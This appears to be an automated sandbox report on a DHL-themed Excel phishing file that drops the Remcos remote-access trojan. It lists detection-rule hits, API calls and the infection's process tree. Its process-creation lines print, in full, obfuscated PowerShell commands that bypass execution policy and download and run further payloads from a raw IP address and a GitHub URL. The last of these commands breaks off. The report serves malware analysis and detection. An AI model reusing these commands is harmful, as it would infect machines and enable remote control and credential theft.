                    Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 33.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.powershell.exe.1239d998.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 14.2.powershell.exe.1239d998.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000E.00000002.457736519.000000001239D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000021.00000002.486168984.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: powershell.exe PID: 4068, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3684, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3956, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 3956, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: RegAsm.exe PID: 3864, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@45/45@7/6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,20_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,22_2_00410DE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,33_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,20_2_00418758
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,20_2_00413D4C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,20_2_0040B58D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,33_2_0041AADB
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\D5230000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8CB4.tmpJump to behavior
                    Source: DHL Shipment Doc's.xlsOLE indicator, Workbook stream: true
                    Source: D5230000.0.drOLE indicator, Workbook stream: true
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................s.....b..k....}..w............\.......................(.P.......................s.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............U........k......U.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................s.....b..k....}..w............\.......................(.P.......................s.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............U........k......U.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.....H.s.....N.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...U........k......U.....(.P.....................H.s..... .......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............U........k......U.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.....................H.s.....8.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............U........k......U.....(.P.....................................................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........H.s.....F.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w..............U........k......U.....(.P.............................l.......................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w..............U........k......U.....(.P.....................H.s.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................0........Wl.....}..w......s.....@E......^...............(.P.....................h.s.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .........................................Wl.....}..w......s.....@E......^...............(.P.....................h.s.............................Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................` _.............
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................H.......:k....}..w....` _.....\.......................(.P.....................H.H.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................` _.....}..w..............].......:k............(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................H.......:k....}..w....` _.....\.......................(.P.....................H.H.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................` _.....}..w..............].......:k............(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.......H.....N.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...].......:k............(.P.......................H..... .......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................` _.....}..w..............].......:k............(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.(.P.......................H.....8.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................` _.....}..w..............].......:k............(.P.....................................................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.............H.....F.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................` _.....}..w..............].......:k............(.P.............................l.......................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......` _.....}..w..............].......:k............(.P.......................H.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................` _.............0.:.N....Wl.....}..w....H.H.....@E......^...............(.P.......................H.............................
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................` _.................N....Wl.....}..w....H.H.....@E......^...............(.P.......................H.............................
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: RegAsm.exe, RegAsm.exe, 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RegAsm.exe, 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: RegAsm.exe, RegAsm.exe, 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: DHL Shipment Doc's.xlsReversingLabs: Detection: 13%
                    Source: DHL Shipment Doc's.xlsVirustotal: Detection: 14%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_21-33280
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerSHell.ExE -eX ByPASs -nOp -w 1 -c DevICeCrEdENTIalDeploYmEnt ; IeX($(iex('[sYSteM.tExT.eNCOdINg]'+[ChAR]0x3a+[char]58+'Utf8.gEtsTRiNG([sYSTem.CoNvERT]'+[CHAR]58+[cHaR]0X3A+'FROmBaSe64stRIng('+[Char]34+'JFAyaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZXJERWZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTE1vTi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiemN3dExOdyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2pWLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZsV2NEcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHhGV2JuVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0Q2piTXpFeFFCKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaG1mWGhPWGdNV1kiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWVzUGFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9YTXlnWUxFWXF2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQMmk6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjAvOTcvcGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vZC50SUYiLCIkRU5WOkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyIsMCwwKTtzVGFydC1zbGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdGRheXNldmVyeXRoaW5nZ29vLnZCUyI='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB349.tmp" "c:\Users\user\AppData\Local\Temp\00kppfao\CSC26532048CBB457996C7A8C029DD268B.TMP"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatdayseverythinggoo.vBS"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzInKyd9JysndScrJ3JsJysnICcrJz0gezB9aHR0cHM6Ly9yYXcuZ2knKyd0JysnaHUnKydidXNlcmNvJysnbnRlbnQuY28nKydtJysnL05vRGV0JysnZScrJ2N0T24vTicrJ29EZXRlYycrJ3RPbi8nKydyZScrJ2YnKydzL2hlYScrJ2RzL21haScrJ24vRGV0YScrJ2hOb3RoLVYnKycudHh0ezB9OycrJyB7JysnMn1iYXNlJysnNjRDb250ZW50ID0gKE5ldy0nKydPYmplY3QnKycgU3lzJysndGVtLk4nKydlJysndCcrJy5XJysnZScrJ2JDbGllbnQpLkRvJysnd24nKydsb2EnKydkJysnU3RyaW5nKHsyJysnfXUnKydybCknKyc7IHsnKycyJysnfScrJ2JpbmFyeUNvbnRlbnQgPSBbJysnUycrJ3knKydzdGVtJysnLkNvJysnbicrJ3YnKydlcnRdOjpGcm8nKydtQmFzZTY0U3QnKydyaW5nKHsnKycyJysnfWJhc2UnKyc2NENvJysnbnQnKydlbnQpOyB7JysnMn1hc3NlJysnbWJseSA9IFtSZScrJ2ZsZWN0JysnaW9uJysnLkFzcycrJ2VtYmwnKyd5JysnXTo6JysnTG9hZCh7Mn1iaW5hcicrJ3lDbycrJ24nKyd0ZW50KTsgWycrJ2RuJysnbGliLklPLkhvbWVdOjpWQUkoezF9JysndHh0LicrJ1YnKydWQkdGJysnUicrJy83JysnOScrJy8wMi4nKycwMicrJzIuMy4yJysnOTEvJysnLycrJzonKydwdHRoezF9LCcrJyB7JysnMX0nKydkZXNhdCcrJ2l2YWRvezEnKyd9LCB7MX0nKydkJysnZXNhdGknKyd2JysnYWRvezF9LCAnKyd7MScrJ31kZXNhJysndGl2YWRveycrJzF9LCcrJyAnKyd7MX1SZWdBc217MX0sJysnIHsxfXsxfSx7MX17MX0pJykgIC1mW0NIYXJdMzksW0NIYXJdMz